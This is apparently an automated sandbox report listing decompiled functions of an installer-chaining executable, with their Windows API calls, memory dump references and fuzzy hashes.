Instruction Fuzzy Hash: 2251B071A01344AFEB30DF68D845BAAB7F4BF00700F14841DE849AB6D1D7B8A944CB96

Function 0009FE10 Relevance: 7.7, APIs: 5, Instructions: 156threadCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0009FF3D

Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F

Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC

SetWindowTextW.USER32(?,?), ref: 0009FE6E

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

GetDlgItem.USER32(00000001,0000040A), ref: 0009FEAA
SetWindowTextW.USER32(00000000,00000000), ref: 0009FEB5

Part of subcall function 000AECD0: GetWindowLongW.USER32(?,000000F0), ref: 000AECF5
Part of subcall function 000AECD0: GetParent.USER32(?), ref: 000AECFF

CreateThread.KERNELBASE(00000000,00000000,Function_00040280,?,00000000,?), ref: 0009FED9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$MessageMonitorParentSendText$CreateDialogFindFromHeapInfoItemProcessRectResourceThread
String ID:
API String ID: 758803202-0
Opcode ID: f017974b1eeb443e89d5d8ec192041564f02cfc28fc3dd4d1bc8ffeaaf15bb56
Instruction ID: ab6b925008751b5458e482908024d339ac4f41bec48b3079eb79a07b94fe0c1a
Opcode Fuzzy Hash: f017974b1eeb443e89d5d8ec192041564f02cfc28fc3dd4d1bc8ffeaaf15bb56
Instruction Fuzzy Hash: 9B51F17260460AAFE710DF58DC45BA9B7E4FF05320F00823AF915C7A91DB76A960CB90

Function 00085970 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 00085991
PeekMessageW.USER32(?,00000000), ref: 000859D7
TranslateMessage.USER32(?), ref: 000859E2
DispatchMessageW.USER32(?), ref: 000859E9
MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 000859FB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: 7c04da2c3f67b25bbaeabd8deffbb35383977f441838efd2063da68b2fbe3c70
Instruction ID: 605007622ea746d5f01d9908e006dfde9598214f52ea0b0ecbc62d5049621910
Opcode Fuzzy Hash: 7c04da2c3f67b25bbaeabd8deffbb35383977f441838efd2063da68b2fbe3c70
Instruction Fuzzy Hash: 88113631640309AAF210DB51DC81FAA73DCEB88770F500626FA50A31C0D664E9448B22

Function 00097410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,D11C52E5,00000000,000F5E8E,000000FF), ref: 00097463
PathAppendW.SHLWAPI(00000000,WindowsPowerShell\v1.0\powershell.exe), ref: 0009747A
PathFileExistsW.KERNELBASE(00000000), ref: 00097488

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

Strings

WindowsPowerShell\v1.0\powershell.exe, xrefs: 00097471

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Path$AppendExistsFileFindFolderHeapProcessResource
String ID: WindowsPowerShell\v1.0\powershell.exe
API String ID: 2424349261-2665178159
Opcode ID: bc9bac6104ac64d47f3a841be74768eba7dc155b561a55885e175c2bb072b960
Instruction ID: 0b336a48359c2e4cbefa9add7007a5471c162864098975e99cfd7de2278e3a0d
Opcode Fuzzy Hash: bc9bac6104ac64d47f3a841be74768eba7dc155b561a55885e175c2bb072b960
Instruction Fuzzy Hash: B7418E726046489FDF64DF68DC49BEA77E8FF04710F104529F91ADB682EB74AA04CB50

Function 000A0210 Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040A), ref: 000A0229
SetWindowTextW.USER32(00000000,?), ref: 000A0230
GetDlgItem.USER32(00000000,0000040B), ref: 000A0241
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 000A024E

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Item$MessageSendTextWindow
String ID:
API String ID: 2101643998-0
Opcode ID: 208f4d52fd38e255c8b85355903fc7e281a1365ffaa0de2ab8e158c592ba23f6
Instruction ID: bd0c9f3ea62e24fb18679acfddcde91a1ec705020d33a3155081ef4aca2eb30a
Opcode Fuzzy Hash: 208f4d52fd38e255c8b85355903fc7e281a1365ffaa0de2ab8e158c592ba23f6
Instruction Fuzzy Hash: 62F03772500716BBEA114FA4DC08E6ABBBAFF48B11B088519F604639A0C771A862DF90

Function 00098490 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00098499
DestroyWindow.USER32(00000005), ref: 000984A8
PostMessageW.USER32(00000005,00000401,00000000,00000000), ref: 000984C6
IsWindow.USER32(00000005), ref: 000984D5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$CurrentDestroyMessagePostThread
String ID:
API String ID: 3186974096-0
Opcode ID: ff3025ea5cc97f600ea69adb6d2e1c69b58c48533d2a6bc05f62b71582df6514
Instruction ID: fe6ca64727d4bb38dbf092c9e1df87cffb57cb59be5b4754c3378ba31698538c
Opcode Fuzzy Hash: ff3025ea5cc97f600ea69adb6d2e1c69b58c48533d2a6bc05f62b71582df6514
Instruction Fuzzy Hash: 8CF082711017909AE7B09B29EE0CB57BBE56F45B00F01890DE58296EA0C7B8F840DB18

Function 00084940 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

_wcsrchr.LIBVCRUNTIME ref: 00084A01

Strings

\\?\, xrefs: 000846AB, 00084728, 0008473A, 00084744, 0008481B, 00084898, 000848AA, 000848B4
p1Wu, xrefs: 000848D7, 00084906

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: HeapProcess_wcsrchr
String ID: \\?\$p1Wu
API String ID: 3185730412-4207130029
Opcode ID: 3d52e05aa39ede076d561de62b17d6e0b211faca139ddfc5b5b559e648781d6c
Instruction ID: 1d33e6c6d01fb845444532a7884fe82542642ce99fc5301ea8486b84eb57e459
Opcode Fuzzy Hash: 3d52e05aa39ede076d561de62b17d6e0b211faca139ddfc5b5b559e648781d6c
Instruction Fuzzy Hash: 5441C370A00506DBCB14EB68C848BAEF7F5FF40324F148269E461DB2D2EB319D04CB91

Function 0009C580 Relevance: 4.6, APIs: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,?,D11C52E5), ref: 0009C5C0
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0009C5FE
RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C,?), ref: 0009C64F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Open$InfoQuery
String ID:
API String ID: 223210943-0
Opcode ID: 1b095932c1b94128fbb51fb7a8326be3c3928af57699e97acd2caacba6ff6642
Instruction ID: 9838a2e4ac396b5c9e945b44b36fcaa23c5a3f6722bd019b9a192c3d58f1f5f9
Opcode Fuzzy Hash: 1b095932c1b94128fbb51fb7a8326be3c3928af57699e97acd2caacba6ff6642
Instruction Fuzzy Hash: DE219176A40609AFEB20CF84DD41F9AF7A8FB04710F20416AFA15E76C0D7B1A914CB91

Function 000A0280 Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000A02A7
EndDialog.USER32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000F7B4D,000000FF), ref: 000A0310
CoUninitialize.OLE32(00000000,?,?,?,?,?,000F7B4D,000000FF), ref: 000A0320

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DialogInitializeUninitialize
String ID:
API String ID: 112388368-0
Opcode ID: 3201b3a74148eb7710ba4696a377295b0416042c3ed44be8e7b4842dd9891840
Instruction ID: 2cf0b37877bd43d8e74bd5f3e6a1a0136ec09eb117d25ebc7c9b26a68b03f934
Opcode Fuzzy Hash: 3201b3a74148eb7710ba4696a377295b0416042c3ed44be8e7b4842dd9891840
Instruction Fuzzy Hash: 3221AC32A01618ABDF608F98C914BAEB7E8EF5AB10F044299EA4197391DB74ED008690

Function 000A00A0 Relevance: 4.5, APIs: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040B), ref: 000A00AD
SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 000A00C8
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 000A00D8

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: c126cbc8f3e7280c57753d78cb5045d7d645bd0c460909c0c4cd19b47608d1c7
Instruction ID: 7b2660e77ebe396f3f5988921e2058afd2cadd68d0a23e4921e46c0b0ce4c783
Opcode Fuzzy Hash: c126cbc8f3e7280c57753d78cb5045d7d645bd0c460909c0c4cd19b47608d1c7
Instruction Fuzzy Hash: 5DF030B52403156FF7109F15DC4EFBA7798EB08711F148415F700A62D0C3BA59059B68

Function 000DAA31 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,000DAA2B,?,000D1672,?,?,D11C52E5,000D1672,?), ref: 000DAA42
TerminateProcess.KERNEL32(00000000,?,000DAA2B,?,000D1672,?,?,D11C52E5,000D1672,?), ref: 000DAA49
ExitProcess.KERNEL32 ref: 000DAA5B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cc88304662187e5e2c4ea0ad61065580328cef83c7d36519d14e0f6b8452af99
Instruction ID: e25dadc0d040a995e4979c8e94dacc2ae4a947ac777eab431871d990f3ab553d
Opcode Fuzzy Hash: cc88304662187e5e2c4ea0ad61065580328cef83c7d36519d14e0f6b8452af99
Instruction Fuzzy Hash: 9ED05E31000284BFEF002F68DD0D89C3F26AF01340B004111B80846232CFB59981EB63

Function 000985F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,00000000,00000000), ref: 000986C1

Strings

$, xrefs: 0009862D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: LongWindow
String ID: $
API String ID: 1378638983-3993045852
Opcode ID: e117570e5445fde43f43da457ea875cad5c4a2728c1f028dbf642e3a0360097c
Instruction ID: 0ed76d2da66fdc90b4a703b5d04c94ff3d2b585e2928cdc16ca1bbf5cb4443b1
Opcode Fuzzy Hash: e117570e5445fde43f43da457ea875cad5c4a2728c1f028dbf642e3a0360097c
Instruction Fuzzy Hash: 1A31B671108380DBDBA49F09C888B1ABBF0BB8A724F04855DF9948F3A5DB75D944CF92

Function 000C9AAA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 103b25dccbb9852772f78d39df23d199962abbfc09354eec647e4584e8fc95e7
Instruction ID: c5797ce9054ffe915c0f55a6f2b663dd06f59c1ea34bd45a159823c998ca1585
Opcode Fuzzy Hash: 103b25dccbb9852772f78d39df23d199962abbfc09354eec647e4584e8fc95e7
Instruction Fuzzy Hash: 93B01295299031EE310493543D0AE3F122CC3C4B10330801EF401D4081D9400C250072

Function 000C9AA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: f16751be6b91d6ee135a161c6c747fe19718d6342d3952bc73d35b41facdf64e
Instruction ID: b4e0a6e495ae4de1516e6f779f59b0463244d297d7c4733c142e83cbbbadf6b4
Opcode Fuzzy Hash: f16751be6b91d6ee135a161c6c747fe19718d6342d3952bc73d35b41facdf64e
Instruction Fuzzy Hash: 1FB01295299131EE310493547D0AE3F115CC3C4B10330411EF001D4081D9500C610072

Function 000C9ABE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: b06afb09beaba7967004a266543f140e6136c3c646f7a546d23b802558234658
Instruction ID: 016a11d81e696176d3a74d1a3345f6f82f83c130e6398e736fa913e15f057c72
Opcode Fuzzy Hash: b06afb09beaba7967004a266543f140e6136c3c646f7a546d23b802558234658
Instruction Fuzzy Hash: 20B01291299031EE315493547E0AF3F111DC3C4B10330802EF001D4081D9410C210072

Function 000C9AB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 10a5f445a40bbe54e44ebc8d7665e7badce587c2e601cc5e285a6acb960d02e7
Instruction ID: 2e1f8697b6e756990cc661392ff8cfe77541cf27954df45d39086cddc0f83ad8
Opcode Fuzzy Hash: 10a5f445a40bbe54e44ebc8d7665e7badce587c2e601cc5e285a6acb960d02e7
Instruction Fuzzy Hash: 14B01291299031EE311493543D0AE3F111CD3C4B10330441EF001E40C1D9400C200072

Function 000C9AC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 4b8609cbaa5e749e30a9f9c3d3325b7ab052812efddc07102ea33876b6fc123a
Instruction ID: 0e351dee7a86f70da01b9b02c6404ab153fe80ca49678a03f5179de23cc0a917
Opcode Fuzzy Hash: 4b8609cbaa5e749e30a9f9c3d3325b7ab052812efddc07102ea33876b6fc123a
Instruction Fuzzy Hash: F2B01291699131EE311493543D0AE3F115CC3C4B10330411EF001D4081D9500C6000B2

Function 000C9AD2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: e6c2ed2fc86d846ebd4c1829edf0ecb5a5baf66493c9e24b7e74ef42a54d8e33
Instruction ID: 76bfe4ba32c424a233875bb177bbe34e6fe468c3563a012a08f8291717b4aada
Opcode Fuzzy Hash: e6c2ed2fc86d846ebd4c1829edf0ecb5a5baf66493c9e24b7e74ef42a54d8e33
Instruction Fuzzy Hash: 73B01291299031EE311493943D0AE3F111CC3C4B10330801EF401D4081D9400C201072

Function 000C9AE6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91, 000C9AE6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
